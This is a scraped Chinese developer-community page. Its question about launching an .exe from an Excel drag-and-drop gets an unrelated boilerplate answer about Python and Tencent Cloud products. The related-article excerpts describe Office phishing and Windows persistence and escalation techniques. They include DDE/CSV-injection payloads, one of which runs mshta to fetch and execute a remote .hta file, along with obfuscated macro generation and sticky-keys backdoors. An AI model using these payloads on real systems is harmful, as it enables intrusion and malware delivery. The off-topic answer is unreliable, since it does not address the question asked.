首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

巨蟒。在cmd中触发.exe(作为excel文件的拖放操作)

巨蟒是一种指代Python编程语言的俚语,它源自于Python的英文名称"Python"与大蟒蛇(Python)之间的谐音关系。Python是一种高级、通用、解释型编程语言,具有简洁、易读、易学的特点,被广泛应用于前端开发、后端开发、数据科学、人工智能等领域。

Python的优势包括:

  1. 简洁易读:Python采用简洁的语法和清晰的代码结构,使得代码易于理解和维护。
  2. 大量的库和框架:Python拥有丰富的第三方库和框架,可以快速构建各种应用和系统。
  3. 跨平台性:Python可以在多个操作系统上运行,包括Windows、Linux和MacOS等。
  4. 强大的社区支持:Python拥有庞大的开发者社区,提供了丰富的文档、教程和解决方案。

在云计算领域,Python也被广泛应用于各个方面,例如:

  1. 云原生应用开发:Python可以用于开发云原生应用,如使用Django或Flask等框架构建Web应用程序。
  2. 自动化运维:Python可以编写脚本来自动化服务器运维任务,如自动化部署、监控和日志处理等。
  3. 数据处理和分析:Python的数据处理和分析库(如NumPy、Pandas和Matplotlib)可以在云平台上进行大规模数据处理和分析。
  4. 机器学习和人工智能:Python的机器学习和人工智能库(如TensorFlow和PyTorch)可以在云平台上进行模型训练和推理。

腾讯云提供了多个与Python相关的产品和服务,包括:

  1. 云服务器(CVM):提供了基于Linux和Windows的云服务器实例,可以在上面运行Python应用。
  2. 云函数(SCF):无服务器函数计算服务,可以使用Python编写函数逻辑。
  3. 云数据库MySQL版(CDB):提供了MySQL数据库服务,可以与Python应用程序进行集成。
  4. 人工智能平台(AI Lab):提供了基于Python的机器学习和深度学习开发环境。

更多关于腾讯云的产品和服务信息,请访问腾讯云官方网站:https://cloud.tencent.com/

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

钓鱼技术

文件验证失败 文件是使用“受保护视图中打开”选项打开 文件是从其他人 OneDrive 存储打开 XLM / Macro 4.0 (excel宏钓鱼) excel下有宏功能,可以用来执行命令...其使用方法如下 右键下方sheet1,选择插入 点击 MS Excel4.0宏表,就可在excel插入一个宏表 依次输入这两个命令,并把第一行设置为Auto_Open 随后保存为xlsm文件即可。...随后当该文件被打开时,会自动打开cmd窗口 这里exec其实是执行cmd命令,我们可以借此来上线cs等操作。 真不错。但在某些情况下打开此类excel文件需手动点击启用宏才能正常钓鱼。...,实用性比宏好 DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" 随后在打开该文件时会出现两个对话框,全点是就会执行以上命令了 office...文件,写好卷标名,然后就把软件包插入到word界面了,只要用户点击该软件包并选择执行,则会执行我们lnk定义代码 而且值得一提是,如果用上述方法把lnk文件放入publisher文件,则在网络打开该文件时不会触发受保护视图

3.2K30
  • DDE注入(CSV)漏洞原理及实战案例全汇总

    渗透遇到导出功能时,会如何进行测试?任意文件下载?或者越权查看?...实际上,除了=号,以下符号都可用于Microsoft Excel触发公式解释: 等于(“=”) 加(“+”) 减号(“ - ”) (”@”) 这个可以帮助我们等号=被过滤时,使用其他运算符绕过...比如我们构造包含如下字符串csv或xls文件: =cmd | '/ C calc' !A0 Excel会尝试调用本机CMD命令,给出友好提示,若用户无意识状态下点击“是”: ?...Excel将打开存储link_location文件,如: ?...界面导出数据处,导出csv文件并在Excel查看: ? 若输入payload:=cmd|' /Ccalc'!A0再次执行,弹出计算器: ?

    9.8K20

    如何使用BoobSnail生成任意Excel 4.0 XLM宏文件

    关于BoobSnail BoobSnail可以帮助广大研究人员生成XLM(Excel 4.0)宏文件,该工具可以XLM宏生成任务给红队和蓝队研究人员提供帮助。...> --out boobsnail.csv 生成能够运行calc.exe经过代码混淆处理宏: python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe...excel4lib库包含了几个类,可以创建生成器过程中使用: macro.Excel4Macro:允许定义Excel4公式和变量值; macro.obfuscator.Excel4Obfuscator...:允许对Excel4宏指令代码进行混淆处理; lang.Excel4Translator:允许将公式转译为其他语言; 下面给出例子中将创建一个能够运行calc.exe简单宏: from excel4lib.macro...("EXEC", cmd) # Dump to CSV print(macro.to_csv()) 结果如下 cmd="calc.exe"; =URUCHOM.PROGRAM(cmd); 如果你需要创建一个能将其他公式作为接收参数公式

    69920

    干货 | Office文档钓鱼实战和免杀技巧

    cmd.exe来举例, 将其重命名为cmdgpj.exe,然后 cmd 与 g 之间右键,看图操作 ok,此时已经变成了 以 jpg 结尾了。但是双击运行还是 exe 格式运行。...生成自解压文件, 图标有点不太对劲,使用 Restorator 把flash图标抠下来,弄到生成自解压文件。 具体操作就不写了,直接看结果。...可以将IYQ简单理解成内置excel一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上列表数据轻松引入到当前excel,而正是因为这样,从而给了我们利用...当受害者双击打开时,默认会用Excel打开,弹出警告,点击启用 因为前面的iqy文件是用cmd执行,所以会继续询问是否启动另一个应用程序,CMD.EXE....PPTX文件,随便填入一些内容,如下图: 这里要选择空白那个,选择以后,页面拉出一个触发位置,之后会弹出动作设置界面,选择鼠标悬停-→ 运行程序 msiexec.exe,系统进程,是Windows

    7.2K21

    CSV注入之RCE&社工钓鱼

    漏洞介绍 CSV公式注入(CSV Injection)是一种会造成巨大影响攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取恶意攻击载荷,当用户打开Excel文件时,文件会从CSV...描述转变为原始Excel格式,包括Excel提供所有动态功能,在这个过程,CSV所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。...漏洞复现 简易测试 Office"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能: 之后构造以下恶意载荷: =1+cmd|' /C calc'!...插入恶意载荷 =1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!...Excel,再次打开Excel时便会导致恶意载荷执行,同时CSV注入也可以用于钓鱼,攻击者可以精心构造一个富含大量数据Excel并插入恶意代码,诱导受害者用户访问并查看,从而触发恶意代码~

    1.4K40

    VS Code(​终端)

    操作将在下拉列表创建另一个条目,可用于它们之间进行切换。 增加N个新得终端 按下垃圾桶按钮删除终端实例。...未分配 调整窗格大小 组态 使用外壳默认$SHELLLinux和macOS上使用,Windows 10上使用PowerShell,Windows早期版本上使用cmd.exe。...打开文件路径 $ {workspaceFolderBasename} -VS Code打开文件夹名称,不带任何斜杠(/) $ {file} -当前打开文件 $ {relativeFile.../your-project/folder/file.ext您编辑器打开文件; 该目录/home/your-username/your-project将作为根工作空间打开。...新名称将显示终端选择下拉列表特定文件打开 默认情况下,终端将在资源管理器打开文件打开。

    3.5K20

    再次发现黑客利用新冠疫情实施钓鱼邮件攻击

    黑客以供应商销售部名义发出钓鱼邮件,附带了包含CVE-2017-11882漏洞利用Excel文件,以运行从恶意网站下载木马程序。...CertUtil.exe是Windows内置程序,用于Windows管理证书,使用该程序可以Windows安装,备份,删除,管理和执行与证书和证书存储相关各种功能。...第二阶段攻击载荷启动加载模块时候,会将木马程序二进制内存数据作为参数传入。加载模块执行过程,首先会对当前系统环境AV产品和操作系统进行检查。...同时,还提供DOC和EXCEL exploit定制服务。 WARZONE RAT因为木马文件存在字符串AVE_MARIA,又被安全厂商识别为Ave Maria。...特权提升针对不同版本操作系统使用不同方法: 1.通过添加Windows Defender排除项提升权限 ?

    1.9K50

    当输入getsystem会发生什么?

    - Token Duplication (In Memory/Admin) ---- 让我们来了解一下原理: 技术 1 Meterpreter将创建一个命名管道,并且还创建并运行一个服务,该服务运行 cmd.exe...\pipe\[random pipe here] 生成cmd.exe连接到Meterpreter命名管道时,Meterpreter将有机会模拟该服务安全上下文(模仿客户端是一个命名管道功能),服务上下文是...若要使用SYSTEM用户上下文创建客户端,此技术将DLL拖放到磁盘上,并将rundll32.exe安排为服务,以将DLL作为SYSTEM运行,然后将DLL连接到命名管道,获得SYSTEM权限。...感兴趣得可以看看elevate_via_service_namedpipe2Meterpreter源代码,研究一下这种技术。注意:该技术将文件拖放到磁盘上。这也是反病毒木马软件查杀依据。...会获取SYSTEM令牌,Meterpreter打开主线程,然后尝试将SYSTEM令牌应用于该线程。

    36610

    当输入getsystem会发生什么?

    Admin) 让我们来了解一下原理: ················ 技术 1 ················ Meterpreter将创建一个命名管道,并且还创建并运行一个服务,该服务运行 cmd.exe...\pipe\[random pipe here] 生成cmd.exe连接到Meterpreter命名管道时,Meterpreter将有机会模拟该服务安全上下文(模仿客户端是一个命名管道功能),服务上下文是...若要使用SYSTEM用户上下文创建客户端,此技术将DLL拖放到磁盘上,并将rundll32.exe安排为服务,以将DLL作为SYSTEM运行,然后将DLL连接到命名管道,获得SYSTEM权限。...感兴趣得可以看看elevate_via_service_namedpipe2Meterpreter源代码,研究一下这种技术。注意:该技术将文件拖放到磁盘上。这也是反病毒木马软件查杀依据。...会获取SYSTEM令牌,Meterpreter打开主线程,然后尝试将SYSTEM令牌应用于该线程。

    1K30

    教你如何开发不可检测C#、C++反向Shell

    在这篇文章,我将跟大家分享如何利用C#和C++来开发反病毒产品无法检测到反向Shell。 ? 简单C#反向Shell GitHub上有很多能够通过cmd.exe打开反向ShellC#代码样本。...在这篇文章,我会从GitHub上借鉴部分代码,然后用到了下面这个C#程序。这个程序不能绕过AV,没有混淆代码,它能做只有“目标设备上打开socket,启动cmd.exe”: ?...你可以看到,.exe文件通过了Windows Defender检测,说明从AV角度来看,它不会执行任何恶意操作,这也是正常扫描结果。 ?...运行命令之后,PS将会下载上述两份文件,然后存储文件系统。接下来,它们会使用Microsoft.Workflow.Compiler.exe来实时编译C#代码,并开启反向Shell。...这个Excel文件并不会被检测为恶意文件,而且能够触发任何警报情况下打开反向Shell。 ? ? ? VirusTotal检测结果 ?

    2K30

    渗透测试与开发技巧

    位Windows系统下执行时候,如果有对注册表和文件操作,存在重定向 对注册表操作: 访问HKLM\Software\实际路径为HKLM\Software\Wow6432Node\ 对文件操作:...快捷方式参数隐藏技巧 将payload放置260个空字符之后,这样无法文件属性查看payload,可以用来快捷方式隐藏payload,欺骗用户点击,隐蔽执行代码 参考: 《渗透技巧——快捷方式文件参数隐藏技巧...文件 利用文件hash算法缺陷,向PE文件隐藏Payload,同时不影响该PE文件数字签名 参考: 《隐写技巧-PE文件数字证书中隐藏Payload》 方法3:特殊ADS (1)... type...persistence》 方法11:Office加载项 如果系统已安装office软件,可通过配置Office加载项实现劫持,作为被动后门 常用利用方式: Word WLL Excel XLL Excel...) 参考: 《渗透技巧——"隐藏"注册表创建》 《渗透技巧——"隐藏"注册表更多测试》 方法19:powershell配置文件 修改powershell配置文件,后门powershell进程启动后触发

    4.5K20

    技术分享-持久性-WMI事件订阅

    notepad.exe 进程时执行 cmd.exe。...该文件将自动存储 WMI 存储库,并且恶意负载/命令将自动执行。 mofcomp.exe ....编译 MOF 文件后,立即生成了一个 Meterpreter 会话。 尽管一些 APT 小组使用 MOF 文件作为 dropper 以实现 WMI 持久性,但不建议将其作为一种方法。...默认情况下,此工具使用记事本,这是一个常见 Windows 应用程序,但可以修改代码以针对任何其他常见进程,例如 word.exe、outlook.exeexcel.exe、calc.exe,具体取决于从主机收集信息态势感知期间...“ wmi_updater ” 模块能够从远程位置获取有效负载,而不是将其存储 WMI 存储库。它将注册为“ AutoUpdater ”,并且可以启动时或一天特定时间设置触发器。

    2.8K10

    红队技巧-常规横向手法

    - 与目标机器已经建立ipc连接 利用 sc 命令 windows系统命令提示符,有一个SC工具命令集。该工具集主要用来对操作系统服务进行管理,该命令是由service一词,简化而来。...然后让跳板机使用copy命令远程操作,将metasploit生成payload文件Gamma.exe复制到目标主机DC系统C盘。 3. 再在目标主机DC上创建一个名称为“backdoor”服务。...sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe 2.WMI WMI是一项核心Windows管理技术,WMI作为一种规范和基础结构...客户端应用程序和服务器进程之间建立通信。大多数情况下,新过程是与DCOM通信关联会话创建。 然后,客户端可以访问新创建对象成员和方法。...注意: 可以将“ Shell.Application”(已加载shell32.dll实现)对象替换为“ Wscript.Shell”. 7.Excel XLL (Excel进程加载恶意DLL) XLL

    2.1K20

    皮肤引擎(HTMLayout)特性说明文档

    启动 bin\browse.exe, 然后用它打开 html_samples 目录下文件查看.)...主界面的皮肤文件没有使用此css文件. HTMLayout Demo 文件 html_samples\form\ 目录下有大部分控件范例文件....匹配被作为弹出菜单或面板显示menu元素. button:owns-popup 匹配触发了弹出行为且弹出菜单或面板处于可见状态 button 元素. div:drop-target 匹配在拖放操作可以接受被拖放对象...div元素. div:drag-over 匹配在拖放操作鼠标所处可接受被拖放对象 div元素. li:moving 匹配正以移动模式被拖放li元素. li:copying 匹配正以副本模式被拖放...behavior: popup-menu; 打开弹出菜单.具有该行为元素点击后会打开子元素第一个 或元素作为菜单.

    31640

    windows CMD命令一些使用方法及注意事项

    、数字问题 首先说不论是执行路径还是脚本参数均不能包含或使用这四类字符[中文、空格、特殊字符、数字] 执行路径还是变量是一定不可以以数字开头,变量也不建议使用纯数字,例如: cmd窗口定义并执行:...// bb set VALUE3=%3% // cc 上面是定义了接收变量,实际也可以不使用接收变量~ 2.cmd执行命令行(裸命令)或脚本文件内 声明: set aa=hello 使用: echo...windows下可以实现zip相关功能工具大概有这俩,这是我用到过: 1.使用7z 这个工具十分好用,既可以GUI操作,也可以使用命令行操作,使用命令行则为: %---- 若 7z.exe 安装在这个地方...---% C:\Program Files\7-Zip\7z.exe %---- 则具体执行命令 ---% "C:\Program Files\7-Zip\7z" a 压缩后文件.zip 文件夹或文件...具体使用如下: %----若 7z.exe 安装在这个地方 ---% D:\zips\zip.exe %---- 执行命令 ---% D:\zips\zip -r 压缩后文件.zip 文件夹或文件

    39110

    python 优化办公(excel

    任务描述: 从图片特定位置获取字符串 作为该图片名字 根据图片名字 excel中标记出来,未找到记录下来,保存退出 特别说明:本文使用文字识别是AipOcr,对应ID,KEY,SECRECT...为你自己,路径都是当前路径,操作excel是win32com 思路: 识别当前目录图片文件excel文件 把图片中需要识别的部分 切割下来,交给第三方识别,然后提取识别结果,并命名 把excel...system('pause') ---- 结果: 光有.PY文件怎么行,别人没有python啊,我们需要打包成.exe文件(注意:别被杀毒软件拦下来,以下操作cmd框框执行,还得注意路径问题)...用pyinstaller生成.exe文件 安装pyinstaller : pip install pyinstaller 使用pyinstaller: pyinstaller -F 你.py文件...-i 你ico图标(logo) 生成.exe文件 dist目录,built目录已经没用了

    1.3K50

    windows中常见后门持久化方法总结

    粘滞键,启动快捷键:按五次shift键 C:\Windows\System32\utilman.exe 设置中心,启动快捷键:Windows+U键 低版本windows,我们可以直接把setch.exe...替换成我们后门程序,下面我们把setch.exe替换为cmd.exe ?...映像劫持 这个和shift后门差不多,只不过低版本windows,我们可以简单地替换程序,但是高版本windows版本替换文件受到了系统保护,所以这里我们要使用另外一个知识点:映像劫持。...其中explorer.exe会调用shell32.dll,然后会加载COM对象MruPidlList,从而触发我们dll文件 ?...c:\Users\qiyou\Desktop\calc.exe //为了方便起见我们直接复制本地文件 bitsadmin /SetNotifyCmdLine test cmd.exe "cmd.exe

    2K20

    1.使用Apache Jmeter对应用压力测试学习与实践

    jar Plugin (可选):JMeter不包括一些JAR, 如果需要应下载这些文件并将其放置lib目录。 温馨提示: 目录名称空格可能会导致问题。...jmeterw.cmd - 不使用windows shell控制台情况下运行JMeter(默认情况下为GUI模式) jmeter-n.cmd - 将文件作为非 GUI 测试运行 jmeter-n-r.cmd...- 将文件作为非 GUI 远程(客户端-服务器)测试运行 jmeter-t.cmd - 加载文件准备运行它作为一个 GUI 测试 jmeter-server.bat - 服务器模式下启动JMeter...设置, 设置这些一种简单方法是创建一个名为setenv.bat文件bin目录。...="en" -Duser.region="EN" JM_LAUNCH - java 可执行文件名称,如 java.exe (默认)或 javaw.exe JVM_ARGS - 启动 JMeter 时要使用

    62520
    领券